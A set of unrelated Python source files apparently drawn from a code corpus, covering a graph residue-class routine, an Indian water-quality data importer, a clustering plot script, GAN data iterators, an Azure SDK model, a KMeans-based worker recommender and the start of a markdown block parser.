        Initialize U_0 from its complement; the complement is given as a set of closures (bounded chains)
:param g: the graph
:param complement: the complement of U_n, i.e. a list of bounded chains
"""
self.O_i = set() # Where we add the trivial q-residue classes
self.O_i2 = dict() # Where we add the non-trivial q-residue classes in a dict node -> dict(cycle-> O_i)
# for cycle in cycles: # Loop over all cycles
# W = cycle[1] # Get the weight of each cycle
# for node in cycle[0][:-1]: # loop over each (unique) node in the cycle
for node in g.nodes_in_cycles:
W = node.optimal_cycle[1]
if node not in self.O_i2: # initialise the node in the O_i2 dict if not yet done
self.O_i2[node] = dict()
            # collect the values needed to construct the various residue classes
l = node.minimal_cyclable
a_i = []
other_O_is = dict()
for closure in complement[node]: # go over each bounded chain in the complement
if closure.step == W:
a_i.append(closure.minVal % W)
other_O_is[closure.minVal % W] = max(closure.maxVal + W,
0 if other_O_is.get(closure.minVal % W) is None else
other_O_is[closure.minVal % W])
O_i = O_equationset(l, W, a_i, [])
self.O_i.add((node, O_i))
for closure in other_O_is:
bc = list(a_i)
bc.remove(closure)
O_i = O_equationset(other_O_is[closure], W, bc, [])
self.O_i2[node][closure] = O_i
def add_residue_class(self, O: O_equationset) -> None:
"""
add a O_equationset to the O_s set
:param O: the O_equationset
:return:
"""
self.O_i.add(O)
def __contains__(self, item: Tuple) -> bool:
"""
return True if item is in any if the O_equationsets
:param item: the item (tuple of node, value) for which we check whether we contain it
:return: bool True if contains False otherwhise
"""
for o in self.O_i:
if item[0] != o[0]:
continue
if item[1] in o[1]:
return True
if item[0] not in self.O_i2:
return False
for attempt in self.O_i2[item[0]]:
if item in self.O_i2[item[0]][attempt]:
return True
# if item[1] % attempt[1] in self.O_i2[item[0]][attempt]:
# if item[1] in self.O_i2[item[0]][attempt][item[1] % attempt[1]]:
# return True
return False
def list_O_i(self) -> list:
"""
:return: a list of all O_is in our U_n object
"""
return_val = list(self.O_i)
for node in self.O_i2:
for a_i in self.O_i2[node]:
return_val.append((node, self.O_i2[node][a_i]))
return return_val
def edit_non_triv_q_residueclass(self, node, W, allowed_a_i, new_minval, all_chains):
"""
edit a non-trivial residue class (possibly allowing more values to be seen)
:param node: the node for which the residue class needs to be edited
:param W: the weight of the class
:param allowed_a_i: the allowed a_i from the non-triv q-res classes for this specific chain
:param new_minval: the new minimal value allowed
:param all_chains: a list of all (currently) bounded chains
:return:the newly edited q-residue class in form of an O_equationset
"""
if node.optimal_cycle[1] == W:
if allowed_a_i in self.O_i2[node]:
new_minval2 = min(new_minval, self.O_i2[node][allowed_a_i].l)
new_bi = []
for chain in all_chains:
if chain.step == W and chain.minVal >= new_minval2:
new_bi += chain.get_index_list(0, chain.len())
new_oi = O_equationset(new_minval2, W, self.O_i2[node][allowed_a_i].a_i, new_bi)
self.O_i2[node][allowed_a_i] = new_oi
return new_oi
|
the-stack_106_23330 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pandas as pd
import json
import re
from india.geo.districts import IndiaDistrictsMapper
class WaterQualityBase():
"""
Base class to import and preprocess data files, generate
mcf and tmcf files for Ground Water and Surface Water quality
datasets.
Args:
dataset_name (str): name of the dataset import
util_names (str): name of the corresponding data csv and json file
template_strings (dict): dictionary with mcf/tmcf node templates
Attributes:
dataset_name, util_names, module_dir, template_strings
"""
def __init__(self, dataset_name, util_names, template_strings):
self.dataset_name = dataset_name
self.util_names = util_names
self.module_dir = os.path.dirname(__file__)
self.solute_mcf = template_strings['solute_mcf']
assert self.solute_mcf != ""
self.solute_tmcf = template_strings['solute_tmcf']
assert self.solute_tmcf != ""
self.chemprop_mcf = template_strings['chemprop_mcf']
assert self.chemprop_mcf != ""
self.chemprop_tmcf = template_strings['chemprop_tmcf']
assert self.chemprop_tmcf != ""
self.site_dcid = template_strings['site_dcid']
assert self.site_dcid != ""
self.unit_node = template_strings['unit_node']
assert self.unit_node != ""
def _drop_all_empty_rows(self, df):
"""
Helper method to drop rows with all empty values.
Some rows in df can have just place names and latlong without any
water quality data. Those rows are dropped here.
"""
        # Rows with only place names and lat/long have the fewest non-null values;
        # keep only rows with at least two more non-null columns than that minimum.
        max_na = df.notnull().sum(axis=1).min()
        max_na += 2  # to account for empty lat and long columns
        return df.dropna(thresh=max_na)
def _map_district_to_lgdcodes(self, mapper, state, district):
try:
return mapper.get_district_name_to_lgd_code_mapping(state, district)
except Exception:
return district
def create_dcids_in_csv(self):
"""
Method to map the district names to LGD District Codes
Mapped codes are used to create dcids for water quality stations
Format of dcid for a station:
'india_wris/<lgd_code_of_district>_<name_of_station>'
Example: 'india_wris/579_Velanganni' for Velanganni station in
Nagercoil, Tamil Nadu, India
"""
self.df = pd.read_csv(
os.path.join(self.module_dir,
'data/{}.csv'.format(self.util_names)))
self.df = self._drop_all_empty_rows(self.df)
# Mapping district names to LGD Codes
mapper = IndiaDistrictsMapper()
df_map = self.df[['StateName',
'DistrictName']].drop_duplicates().dropna()
df_map['DistrictCode'] = df_map.apply(
lambda x: self._map_district_to_lgdcodes(mapper, x['StateName'], x[
'DistrictName']),
axis=1)
# Merging LGD codes with original df and creating dcids
self.df = self.df.merge(df_map.drop('StateName', axis=1),
on='DistrictName',
how='left')
self.df['dcid'] = self.df.apply(lambda x: ''.join([
'india_wris/',
str(x['DistrictCode']), '_', ''.join(
re.split('\W+', x['Station Name']))
]),
axis=1)
# Saving the df with codes and dcids in `csv_save_path`
csv_save_path = os.path.join(self.module_dir,
'{}'.format(self.dataset_name),
"{}.csv".format(self.dataset_name))
self.df.to_csv(csv_save_path, index=None)
def create_mcfs(self):
"""
Method to create MCF and TMCF files for the data
Template strings are found inside preprocess.py files
"""
# Defining paths for files
json_file_path = os.path.join(self.module_dir,
"util/{}.json".format(self.util_names))
tmcf_file = os.path.join(self.module_dir,
'{}'.format(self.dataset_name),
"{}.tmcf".format(self.dataset_name))
mcf_file = os.path.join(self.module_dir, '{}'.format(self.dataset_name),
"{}.mcf".format(self.dataset_name))
## Importing water quality indices from util/
with open(json_file_path, 'r') as j:
properties = json.loads(j.read())
pollutants, chem_props = properties
idx = 2 # StatVarObs start from E2; E0 and E1 are location nodes
## Writing MCF and TMCF files
with open(mcf_file, 'w') as mcf, open(tmcf_file, 'w') as tmcf:
# Writing TMCF Location Nodes
tmcf.write(self.site_dcid.format(dataset_name=self.dataset_name))
# Pollutant nodes are written first
for pollutant in pollutants['Pollutant']:
name = pollutant['name']
statvar = pollutant['statvar']
unit = pollutant['unit']
# Writing MCF Node
mcf.write(self.solute_mcf.format(variable=statvar))
# Writing TMCF Property Node
tmcf.write(
self.solute_tmcf.format(dataset_name=self.dataset_name,
index=idx,
variable=statvar,
name=name))
# If unit is available for a StatVar, unit is written in TMCF
if unit:
tmcf.write(self.unit_node.format(unit=unit))
# else, unit is omitted from the node
else:
tmcf.write('\n')
idx += 1
# Chemical properties are written second
for chem_prop in chem_props['ChemicalProperty']:
name = chem_prop['name']
statvar = chem_prop['statvar']
unit = chem_prop['unit']
dcid = chem_prop['dcid']
mcf.write(
self.chemprop_mcf.format(variable=statvar,
dcid=dcid,
statvar=statvar))
tmcf.write(
self.chemprop_tmcf.format(dataset_name=self.dataset_name,
index=idx,
unit=unit,
variable=statvar,
dcid=dcid,
name=name))
if unit:
tmcf.write(self.unit_node.format(unit=unit))
else:
tmcf.write('\n')
idx += 1
|
the-stack_106_23333 | from __future__ import absolute_import, division, print_function, unicode_literals
import socket
import matplotlib
import numpy as np
import os
import collections
import argparse
machine = socket.gethostname()
if machine == "bsccv03":
matplotlib.use('wxagg')
elif 'login' in machine:
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
try:
# This might fail for older versions of matplotlib (e.g in life cluster)
plt.style.use("ggplot")
except (AttributeError, NameError):
pass
def printHelp():
"""
Create command line interface
:returns: str -- Output filename ( if specified )
"""
desc = "Program that prints the number of clusters throughout an adaptive sampling simulation. "\
"It must be run in the root folder. "
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("-f", "--filename", type=str, default="", help="Output filename")
parser.add_argument("-o", "--output", type=str, default="", help="Output folder")
args = parser.parse_args()
return args.filename, args.output
def getClusteringSummaryContent(summaryFile):
"""
Get the contents of clustering summary file
:param summaryFile: Clustering summary file
:type summaryFile: str
:returns: list -- List with the contents of the clustering summary file
"""
if os.path.isfile(summaryFile):
summaryContent = np.genfromtxt(summaryFile)
if summaryContent.ndim > 1:
return summaryContent
elif summaryContent.ndim == 1:
# file has only one line
return np.array([summaryContent])
else:
# file existed but was empty
return []
else:
return []
def getTotalNumberOfClustersPerEpoch(templetizedClusteringSummaryFile, folder):
"""
Get the number of clusters in each epoch
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param folder: Folder where the simulation data is stored
:type folder: str
:returns: list -- List with the number of cluster in each simulation
epoch
"""
allFolders = os.listdir(folder)
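    # an epoch is counted only if its clustering summary file actually exists on disk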
numberOfEpochs = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))])
totalNumberOfClustersPerEpoch = []
for epoch in range(numberOfEpochs):
clusteringSummary = getClusteringSummaryContent(templetizedClusteringSummaryFile % epoch)
        if len(clusteringSummary) != 0:
totalNumberOfClustersPerEpoch.append(len(clusteringSummary))
return totalNumberOfClustersPerEpoch
def findDifferentClustersInEpoch(column, summaryFile):
"""
Get the distribution of values of a certain column in the clustering
summary
:param column: Column of interest
:type column: int
:param summaryFile: Clustering summary file
:type summaryFile: str
:returns: dict -- Dictionary with the set of different elements in
column and the number of elements in this epoch
"""
clusteringSummary = getClusteringSummaryContent(summaryFile)
epochDictionary = {}
    if len(clusteringSummary) != 0:
for line in clusteringSummary:
value = line[column]
if value not in epochDictionary:
epochDictionary[value] = len(np.argwhere(clusteringSummary[:, column] == value))
return epochDictionary
def findDifferentClustersForAllEpochs(column, templetizedClusteringSummaryFile, numberOfEpochs):
"""
Get the distribution of values of a certain column in the clustering
summary for each epoch
:param column: Column of interest
:type column: int
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param numberOfEpochs: Total number of epochs in the simulation
:type numberOfEpochs: int
:returns: list -- List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
"""
clustersPerEpoch = []
for epoch in range(numberOfEpochs):
summaryFile = templetizedClusteringSummaryFile % epoch
epochDictionary = findDifferentClustersInEpoch(column, summaryFile)
clustersPerEpoch.append(epochDictionary)
return clustersPerEpoch
def getAllDifferentValues(clustersPerEpoch):
"""
    Get all the different values occurring during a simulation
:param clustersPerEpoch: List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
:type clustersPerEpoch: list
    :returns: set -- Set containing all values occurring during a simulation
"""
allValues = set()
for epochSummary in clustersPerEpoch:
for value in epochSummary:
allValues.update([value])
return allValues
def buildClustersPerValue(clustersPerEpoch, numberOfEpochs):
"""
Get the number of clusters that have each value
:param clustersPerEpoch: List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
:type clustersPerEpoch: list
:param numberOfEpochs: Total number of epochs in the simulation
:type numberOfEpochs: int
:returns: dict -- Dictionary with the number of clusters that have each
value
"""
clustersPerValue = collections.defaultdict(list)
allValues = getAllDifferentValues(clustersPerEpoch)
for epochSummary in clustersPerEpoch:
foundValues = set()
for value, numClusters in epochSummary.items():
clustersPerValue[value].append(numClusters)
foundValues.update([value])
for value in allValues - foundValues:
clustersPerValue[value].append(0)
return clustersPerValue
def getNumberOfClustersPerEpochForGivenColumn(column, templetizedClusteringSummaryFile, folder):
"""
Get the number of clusters that have each value at each epoch
:param column: Column of interest
:type column: int
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param folder: Folder where the simulation data is stored
:type folder: str
:returns: dict -- Dictionary with the number of clusters that have each
value
"""
allFolders = os.listdir(folder)
numberOfEpochs = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))])
clustersPerEpoch = findDifferentClustersForAllEpochs(column, templetizedClusteringSummaryFile, numberOfEpochs)
return buildClustersPerValue(clustersPerEpoch, numberOfEpochs)
def plotClustersPerValue(clustersPerValue):
"""
Plot the number of clusters that have a certain value
:param clustersPerValue: Dictionary with the number of clusters that have each
value
:type clustersPerValue: dict
"""
values = list(clustersPerValue.keys())
sortedValues = np.sort(values)
for value in sortedValues:
plt.plot(clustersPerValue[value], label=str(value))
def plotContactsHistogram(folder, templetizedClusteringSummaryFile):
"""
Plot the histogram of the number of contacts
:param folder: Folder where the simulation data is stored
:type folder: str
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
"""
allFolders = os.listdir(folder)
lastEpoch = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))]) - 1
lastSummary = templetizedClusteringSummaryFile % lastEpoch
contactsColumn = 3
allContacts = np.loadtxt(lastSummary, usecols=(contactsColumn,), ndmin=1)
plt.hist(allContacts)
def main(filename, outputPath):
"""
Plot a summary of the clustering for a simulation:
1) Number of clusters for each threshold value at each epoch
2) Number of clusters for each density value at each epoch
3) Histogram of the number of contacts
"""
if filename:
print("FILENAME", filename)
outputPath = os.path.join(outputPath, "")
if outputPath and not os.path.exists(outputPath):
os.makedirs(outputPath)
# Params
clusteringFileDensityColumn = 5
clusteringFileThresholdColumn = 4
clusteringFolder = "clustering"
summaryFile = "summary.txt"
folder = "."
# end params
clusteringSummaryFile = os.path.join(clusteringFolder, summaryFile)
templetizedClusteringSummaryFile = os.path.join("%d", clusteringSummaryFile)
totalNumberOfClustersPerEpoch = getTotalNumberOfClustersPerEpoch(templetizedClusteringSummaryFile, folder)
clustersPerDensityValue = getNumberOfClustersPerEpochForGivenColumn(clusteringFileDensityColumn, templetizedClusteringSummaryFile, folder)
clustersPerThresholdValue = getNumberOfClustersPerEpochForGivenColumn(clusteringFileThresholdColumn, templetizedClusteringSummaryFile, folder)
plt.figure(1)
plt.plot(totalNumberOfClustersPerEpoch, label="All clusters")
if filename != "":
plt.savefig("%s%s_total.png" % (outputPath, filename))
plotClustersPerValue(clustersPerDensityValue)
plt.title("Number of cluser per density value")
plt.xlabel("Epoch")
plt.ylabel("Number of clusters")
plt.legend(loc=2)
if filename != "":
plt.savefig("%s%s_density.png" % (outputPath, filename))
plt.figure(2)
plt.plot(totalNumberOfClustersPerEpoch, label="All clusters")
plotClustersPerValue(clustersPerThresholdValue)
plt.title("Number of cluser per threshold value")
plt.xlabel("Epoch")
plt.ylabel("Number of clusters")
plt.legend(loc=2)
if filename != "":
plt.savefig("%s%s_threshold.png" % (outputPath, filename))
plt.figure(3)
plotContactsHistogram(folder, templetizedClusteringSummaryFile)
plt.title("Contact ratio distribution")
plt.xlabel("Contact ratio")
if filename != "":
plt.savefig("%s%s_hist.png" % (outputPath, filename))
plt.show()
if __name__ == "__main__":
file_name, outputFolder = printHelp()
main(file_name, outputFolder)
|
the-stack_106_23334 | # -*- coding:utf-8 -*-
import os
import random
import math
import numpy as np
import torch
class GenDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(GenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
# print ((len(self.data_lis[1])))
# exit()
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(math.ceil(float(self.data_num)/self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num:
raise StopIteration
index = self.indices[self.idx:self.idx+self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
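        # (comment added for clarity) Standard next-token setup for generator
        # training: the input is the sample prefixed with a 0 start token and
        # the target is the sample shifted left by one (padded with a trailing
        # 0), so the model predicts the following token at every position.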
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class DisDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, real_data_file, fake_data_file, batch_size):
super(DisDataIter, self).__init__()
self.batch_size = batch_size
real_data_lis = self.read_file(real_data_file)
fake_data_lis = self.read_file(fake_data_file)
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] +\
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = (len(self.pairs))
self.indices = range(self.data_num)
self.num_batches = int(math.ceil(float(self.data_num)/self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num:
raise StopIteration
index = self.indices[self.idx:self.idx+self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
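# Minimal usage sketch (hypothetical file names; not part of the original
# module). Both iterators expect whitespace-separated integer tokens per line:
#
#     gen_iter = GenDataIter('real.data', batch_size=64)
#     for data, target in gen_iter:
#         ...  # train the generator on (data, target)
#
#     dis_iter = DisDataIter('real.data', 'generated.data', batch_size=64)
#     for data, label in dis_iter:
#         ...  # train the discriminator on (data, label)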
|
the-stack_106_23335 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SkuInfos(Model):
"""Collection of SKU information.
:param resource_type: Resource type that this SKU applies to.
:type resource_type: str
:param skus: List of SKUs the subscription is able to use.
:type skus: list of :class:`GlobalCsmSkuDescription
<azure.mgmt.web.models.GlobalCsmSkuDescription>`
"""
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'skus': {'key': 'skus', 'type': '[GlobalCsmSkuDescription]'},
}
def __init__(self, resource_type=None, skus=None):
self.resource_type = resource_type
self.skus = skus
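# Illustrative construction (hypothetical values; not part of the generated
# client code):
#
#     infos = SkuInfos(resource_type='Microsoft.Web/sites',
#                      skus=[...])  # list of GlobalCsmSkuDescription objects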
|
the-stack_106_23336 | import pandas as pd
import numpy as np
# import matplotlib.pyplot as plt
from collections import defaultdict
from sklearn import preprocessing
from scipy import sparse
from operator import itemgetter
# from scipy.spatial.distance import cosine
import pickle
# import seaborn
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
# import os
def vectorizer(columnsValues):
# location,service,certification,age_prefernce,gender,types,availability,
# wage_preference,exprience,clients_attended,doorstep_service,
# reference,liscenced,shopping_liscence
vector = []
location = [0] * 44
occupatn = [0] * 23
cert = [0] * 2
age = [0] * 5
gender = [0] * 2
types = [0] * 2
availability = [0] * 4
minimumWage = [0] * 3
exp = [0] * 3
clients = [0] * 3
references = [0] * 2
liscenced = [0] * 2
shoppingliscence = [0] * 2
doorstepService = [0] * 2
location[int(columnsValues[2])] = 1
occupatn[int(columnsValues[3])] = 1
cert[int(columnsValues[4])] = 1
age[int(columnsValues[5])] = 1
gender[int(columnsValues[6])] = 1
types[int(columnsValues[7])] = 1
availability[int(columnsValues[8])] = 1
minimumWage[int(columnsValues[9])] = 1
exp[int(columnsValues[10])] = 1
clients[int(columnsValues[11])] = 1
doorstepService[int(columnsValues[12])] = 1
references[int(columnsValues[13])] = 1
liscenced[int(columnsValues[14])] = 1
shoppingliscence[int(columnsValues[15])] = 1
vector.extend(location)
vector.extend(occupatn)
vector.extend(cert)
vector.extend(age)
vector.extend(gender)
vector.extend(types)
vector.extend(availability)
vector.extend(minimumWage)
vector.extend(exp)
vector.extend(clients)
vector.extend(doorstepService)
vector.extend(references)
vector.extend(liscenced)
vector.extend(shoppingliscence)
return list(vector)
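# Sketch of how vectorizer is expected to be called (values below are made up;
# columnsValues holds already label-encoded fields at indices 2-15 as listed in
# the comment above):
#
#     row = [0, 0, 12, 3, 1, 2, 0, 1, 2, 1, 0, 1, 1, 0, 1, 0]
#     one_hot = vectorizer(row)
#     len(one_hot)  # 44+23+2+5+2+2+4+3+3+3+2+2+2+2 == 99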
class BuildAndTrain():
def __init__(self):
self.df = self.dataUtility()
self.classesOfColumns = defaultdict(list)
self.occupations = defaultdict(list)
self.kmeans = []
self.df = self.utilities(self.df)
# self.kneighborsOfUserQuery, self.finalCluster = self.KmeanPredictor('1', sparse1[116])
self.classesOfColumns = self.unpickleLoader('clsofclos')
self.occupations = self.unpickleLoader('occupations')
#####################################DATA UTILITY ###################################################
def dataUtility(self):
df = pd.read_csv('final_data.csv')
df = df.drop(['phoneNo', 'id', 'availabilityPreference', 'aadharCard'],
axis=1)
df.dropna(inplace=True)
print('DataUtility Done')
return df
####################################UTILITY FUNCTIONS IMPLEMENTED######################################
def classer(self, temp_df):
# np.logical_and(df[:]['Location'] == 30, df[:]['Occupation'] ==2).nonzero()[0].tolist()
temp_df.loc[temp_df['minimumWage']<5001, 'minimumWage'] = 0
temp_df.loc[np.logical_and(temp_df['minimumWage']>5000, temp_df['minimumWage']<8001),'minimumWage'] = 1
temp_df.loc[np.logical_and(temp_df['minimumWage']>8000, temp_df['minimumWage']<10001),'minimumWage'] = 2
temp_df.loc[(temp_df['experience']<3), 'experience'] = 0
temp_df.loc[np.logical_and(temp_df['experience']>2, temp_df['experience']<7),'experience'] = 1
temp_df.loc[np.logical_and(temp_df['experience']>6, temp_df['experience']<11),'experience'] = 2
temp_df.loc[temp_df['age']<21,'age'] = 0
temp_df.loc[np.logical_and(temp_df['age']>20, temp_df['age']<26),'age'] = 1
temp_df.loc[np.logical_and(temp_df['age']>25, temp_df['age']<30),'age'] = 2
temp_df.loc[np.logical_and(temp_df['age']>29, temp_df['age']<40),'age'] = 3
        # Bin clientsAttended into 5 classes; the first band must be <10 so the
        # later 10-20/20-30/30-40 bands below are not overwritten.
        temp_df.loc[temp_df['clientsAttended']<10, 'clientsAttended'] = 0
temp_df.loc[np.logical_and(temp_df['clientsAttended']>10, temp_df['clientsAttended']<20),'clientsAttended'] = 1
temp_df.loc[np.logical_and(temp_df['clientsAttended']>20, temp_df['clientsAttended']<30),'clientsAttended'] = 2
temp_df.loc[np.logical_and(temp_df['clientsAttended']>30, temp_df['clientsAttended']<40),'clientsAttended'] = 3
temp_df.loc[temp_df['clientsAttended']>40, 'clientsAttended'] = 4
return temp_df
def classes_maker(self,temp_df):
temp = temp_df.columns.tolist()
# temp.remove('age')
for i in temp_df.columns:
le = preprocessing.LabelEncoder()
le.fit(temp_df[i])
self.classesOfColumns[i].append(le.classes_)
temp_df[i] = le.transform(temp_df[i])
return temp_df
def all_occupations_in_a_location(self, temp_df):
        # Map each occupation to the list of dataframe row indices (workers)
        # that hold that occupation.
for index, row in temp_df.iterrows():
self.occupations[row['occupation']].append(index)
for key, values in self.occupations.items():
t_set = list(set(values))
self.occupations[key] = t_set
def occs_splitter(self, df):
for key in self.occupations.keys():
temp_df = df.iloc[self.occupations[key]]
# temp_df.loc[:, ~df.columns.str.contains('^Unnamed')]
temp_df.to_csv(str(key) + '.csv', index=False)
def sparser(self):
for i in range(len(self.occupations.keys())):
sparse = []
temp_df = pd.read_csv(str(i) + '.csv')
for index, row in temp_df.iterrows():
vector = []
                # One-hot blocks sized by the number of label-encoded classes
                # in each column (np.unique returns the distinct values, so its
                # length is the class count).
                location = [0] * len(np.unique(self.df['location']))
                occupatn = [0] * len(np.unique(self.df['occupation']))
                cert = [0] * len(np.unique(self.df['certification']))
                age = [0] * len(np.unique(self.df['age']))
                gender = [0] * len(np.unique(self.df['gender']))
                types = [0] * len(np.unique(self.df['type']))
                availability = [0] * len(np.unique(self.df['availability']))
                minimumWage = [0] * len(np.unique(self.df['minimumWage']))
                exp = [0] * len(np.unique(self.df['experience']))
                clients = [0] * len(np.unique(self.df['clientsAttended']))
                references = [0] * len(np.unique(self.df['references']))
                liscenced = [0] * len(np.unique(self.df['liscenced']))
                shoppingliscence = [0] * len(np.unique(self.df['shoppingliscence']))
                doorstepService = [0] * len(np.unique(self.df['doorstepService ']))
location[row['location']] = 1
occupatn[row['occupation']] = 1
cert[row['certification']] = 1
age[row['age']] = 1
gender[row['gender']] = 1
types[row['type']] = 1
availability[row['availability']] = 1
minimumWage[row['minimumWage']] = 1
exp[row['experience']] = 1
clients[row['clientsAttended']] = 1
doorstepService[row['doorstepService ']] = 1
references[row['references']] = 1
liscenced[row['liscenced']] = 1
shoppingliscence[row['shoppingliscence']] = 1
vector.extend(location)
vector.extend(occupatn)
vector.extend(cert)
vector.extend(age)
vector.extend(gender)
vector.extend(types)
vector.extend(availability)
vector.extend(minimumWage)
vector.extend(exp)
vector.extend(clients)
vector.extend(doorstepService)
vector.extend(references)
vector.extend(liscenced)
vector.extend(shoppingliscence)
sparse.append(list(vector))
self.pickler(sparse, str(i)+'_sparse')
def utilities(self, temp_df):
temp_df = self.classer(temp_df)
temp_df = self.classes_maker(temp_df)
# self.all_occupations_in_a_location(temp_df)
self.occs_splitter(temp_df)
self.sparser()
# self.pickler(self.classesOfColumns, 'clsofclos')
# self.pickler(self.occupations, 'occupations')
print("Utilites executed")
return temp_df
################################GENERIC FUNCTIONS#####################################
def pickler(self, toBeDumped, filename):
with open(str(filename) + '.pkl', 'wb') as file:
file.write(pickle.dumps(toBeDumped))
def unpickleLoader(self,filename):
with open(filename + '.pkl', 'rb') as f:
unpickled = pickle.loads(f.read())
return unpickled
##############MODELLING STUFF##########################################
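    # Pipeline summary (comment added for clarity): fit one KMeans model per
    # occupation on its one-hot sparse matrix, assign the user query to a
    # cluster, gather every worker in that cluster, and rank them with a
    # NearestNeighbors search to return the closest matches.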
def modelling(self, service, userquery):
# read the sparse matrix file of the particular job example
temp_files = []
for i in range(len(self.occupations.keys())):
temp_files.append(self.unpickleLoader(str(i)+'_sparse'))
            kmodel = KMeans(max_iter=4,
                            n_clusters=10, n_init=10).fit(temp_files[i])
            self.kmeans.append(kmodel)
            # Persist each fitted model so KmeanPredictor below can reload it
            # via unpickleLoader(str(service) + '_model').
            self.pickler(kmodel, str(i) + '_model')
print('Modelling done')
return self.KmeanPredictor(service, userquery)
def KmeanPredictor(self,service, userquery): # modelNos same as service
kmeanModel = self.unpickleLoader(str(service) + '_model')
print('Predicting kmean cluster')
return self.KMeanClusterIndexes(kmeanModel, kmeanModel.predict(np.array(userquery).reshape(1,-1)), userquery, service)
def KMeanClusterIndexes(self, kMeanModel, userQueryClusterLabel, userquery, service):
temp = kMeanModel.labels_.tolist()
count = 0
li = []
for i in temp:
if i == userQueryClusterLabel:
li.append(count)
count = count + 1
print('getting all points in the same cluster')
return self.clusteredDataframe(li, service, userquery)
def clusteredDataframe(self, clustEleIndex, service, userQuery):
temp_sparse = self.unpickleLoader(str(service) + '_sparse')
temp_df = pd.read_csv(str(service) + '.csv')
KMclustered_dataframe = temp_df.loc[clustEleIndex]
temp_sparse = [temp_sparse[x] for x in clustEleIndex]
print('Temporary cluster formation')
return self.NearestNeighborsAlgo(temp_sparse, userQuery,KMclustered_dataframe)
def NearestNeighborsAlgo(self, clusteredSparse, userQuery, KMeanClusterIndexes):
neigh = NearestNeighbors(n_neighbors=9)
neigh.fit(clusteredSparse)
print('Applying nearest neighbour')
return neigh.kneighbors(np.array(userQuery).reshape(1,-1)), KMeanClusterIndexes
kmeans = []
if __name__ == '__main__':
bnt = BuildAndTrain()
df = bnt.dataUtility()
classesOfColumns = defaultdict(list)
occupations = defaultdict(list)
# pickler(classesOfColumns, 'clsofclos')
# pickler(occupations, 'occupations')
df = bnt.utilities(df)
sparse1 = bnt.unpickleLoader('1_sparse')
kneighborsOfUserQuery, finalCluster = bnt.modelling('1', sparse1[116])
print(kneighborsOfUserQuery, finalCluster)
|
the-stack_106_23339 | """Block-level tokenizer."""
import logging
from typing import List, Optional, Tuple
from .ruler import Ruler
from .token import Token
from .rules_block.state_block import StateBlock
from . import rules_block
LOGGER = logging.getLogger(__name__)
_rules: List[Tuple] = [
# First 2 params - rule name & source. Secondary array - list of rules,
# which can be terminated by this one.
("table", rules_block.table, ["paragraph", "reference"]),
("code", rules_block.code),
("fence", rules_block.fence, ["paragraph", "reference", "blockquote", "list"]),
(
"blockquote",
rules_block.blockquote,
["paragraph", "reference", "blockquote", "list"],
),
("hr", rules_block.hr, ["paragraph", "reference", "blockquote", "list"]),
("list", rules_block.list_block, ["paragraph", "reference", "blockquote"]),
("reference", rules_block.reference),
("heading", rules_block.heading, ["paragraph", "reference", "blockquote"]),
("lheading", rules_block.lheading),
("html_block", rules_block.html_block, ["paragraph", "reference", "blockquote"]),
("paragraph", rules_block.paragraph),
]
class ParserBlock:
"""
ParserBlock#ruler -> Ruler
